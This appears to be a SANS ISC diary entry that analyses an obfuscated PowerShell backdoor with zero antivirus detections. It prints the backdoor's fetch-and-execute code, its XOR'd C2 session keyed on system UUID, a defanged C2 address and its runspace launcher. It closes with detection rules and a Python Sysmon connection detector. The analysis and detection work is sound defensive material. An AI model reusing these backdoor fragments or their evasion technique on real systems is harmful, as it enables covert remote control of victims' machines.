Simple but Undetected PowerShell Backdoor
For a while now, most security people have agreed that antivirus products are not enough for effective protection against malicious code. They can block many threats, but some remain undetected by classic technologies. Here is another example, a simple but effective PowerShell backdoor that I spotted yesterday. The file has been uploaded to VT (SHA256:4cd82b6cbd3e20fc8a9a0aa630d2a866d32cfb60e76b032191fda5d48720a64d) and received a score of ... 0/57! [1].
The script is pretty well obfuscated and hides a simple backdoor. The technique is string pollution: garbage characters are inserted into strings, then removed with a split() that produces an array from which specific elements are referenced:

PS C:\Users\REM> (("103AN449AN24AN445AN72AN796AN976AN159AN40AN26" -split "AN")[4])
72
The C2 server returns JSON data, which is parsed to extract the code to execute through Invoke-Expression:

# Minimal JSON deserializer built on System.Web.Extensions (works on old PowerShell versions)
function ConvertFrom-JSON20([object] $item){
    add-type -assembly system.web.extensions;
    $ps_js=new-object system.web.script.serialization.javascriptSerializer;
    $ps_js.MaxJsonLength = 99999999
    return ,$ps_js.DeserializeObject($item);
}
# Decode the C2 response: XOR with the key, convert to a string, parse the JSON
$res = xor $res $cmp
$res = $enc.GetString($res);
$res = ConvertFrom-JSON20($res);
# The "script" field is Base64-encoded PowerShell; it is turned into a script block and executed with its arguments
$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($res.script));
$script = [Scriptblock]::Create($script);
Invoke-Command -ScriptBlock $script -ArgumentList $res.args;
All communications are XOR'd (there is a xor() function to perform a multi-byte encoding).
The session with the C2 server (hxxp://45[.]77[.]127[.]230:8888)[2] is established and maintained based on the infected system's UUID:

$UUID = (get-wmiobject Win32_ComputerSystemProduct).uuid;
$xorkey = $enc.GetBytes($cmp)
$data = xor $enc.GetBytes($UUID) $xorkey;
Finally, the backdoor is launched in a PowerShell RunSpace:

$rs = [runspacefactory]::CreateRunspace()
$rs.ApartmentState = "STA"
$rs.ThreadOptions = "ReuseThread"
$rs.Open()
$rs.SessionStateProxy.SetVariable("h",$host)
$ps = [PowerShell]::Create()
$ps.Runspace = $rs
$ps.AddScript($script) | out-null
$ps.AddArgument($srv) | out-null
$ps.AddArgument($cmp) | out-null
$res = $ps.BeginInvoke()
Based on the script code, even if it is not flagged as malicious by regular AV engines, it is pretty easy to spot the malicious activity with an EDR tool or Microsoft Sysmon. PowerShell should not:
- perform HTTP connections on non-standard ports
- connect to IP addresses
- perform HTTP connections outside of the perimeter or to hosts not listed in an allowlist.
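The three rules above, applied to Sysmon Event ID 3 (NetworkConnect) records, as an added example that is not part of the diary. The records are constructed in-line using Sysmon's field names (Image, DestinationIp, DestinationPort, DestinationHostname); the allowlist and internal range are hypothetical, and the only real value is the C2 endpoint from the diary.

```python
import ipaddress
from typing import Dict, List

# Constructed Sysmon Event ID 3 records, reduced to the fields the rules need.
# Only 45.77.127.230:8888 comes from the diary; everything else is made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "DestinationIp": "45.77.127.230", "DestinationPort": 8888,
     "DestinationHostname": ""},                                   # the backdoor's C2
    {"Image": PS, "DestinationIp": "10.0.0.25", "DestinationPort": 443,
     "DestinationHostname": "intranet.corp.example"},              # benign internal
    {"Image": PS, "DestinationIp": "203.0.113.10", "DestinationPort": 443,
     "DestinationHostname": "updates.vendor.example"},             # external, not allowlisted
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "45.77.127.230", "DestinationPort": 8888,
     "DestinationHostname": ""},                                   # not PowerShell: out of scope
]

ALLOWED_HOSTS = {"intranet.corp.example"}          # hypothetical allowlist
STANDARD_PORTS = {80, 443}
PERIMETER = [ipaddress.ip_network("10.0.0.0/8")]   # hypothetical internal range


def is_powershell(image: str) -> bool:
    """Match the PowerShell hosts by image basename, whatever the install path."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def evaluate(event: dict) -> List[str]:
    """Return the names of the rules this event violates (empty list = no alert)."""
    if not is_powershell(event["Image"]):
        return []
    ip = ipaddress.ip_address(event["DestinationIp"])
    host = event.get("DestinationHostname") or ""
    hits = []
    if event["DestinationPort"] not in STANDARD_PORTS:
        hits.append("non-standard-port")
    if not host:                      # no name resolved: connection made straight to an IP
        hits.append("raw-ip-destination")
    outside = not any(ip in net for net in PERIMETER)
    if outside and host not in ALLOWED_HOSTS:
        hits.append("outside-perimeter-not-allowlisted")
    return hits


def scan(events: List[dict]) -> Dict[int, List[str]]:
    """Map the index of each alerting event to the rules it triggered."""
    return {i: hits for i, e in enumerate(events) if (hits := evaluate(e))}
```

Run against the sample, the C2 connection trips all three rules, the vendor update host trips only the allowlist rule, and the internal and non-PowerShell connections stay silent.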
[1] https://www.virustotal.com/gui/file/4cd82b6cbd3e20fc8a9a0aa630d2a866d32cfb60e76b032191fda5d48720a64d/detection
[2] https://isc.sans.edu/ipinfo.html?ip=45.77.127.230
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant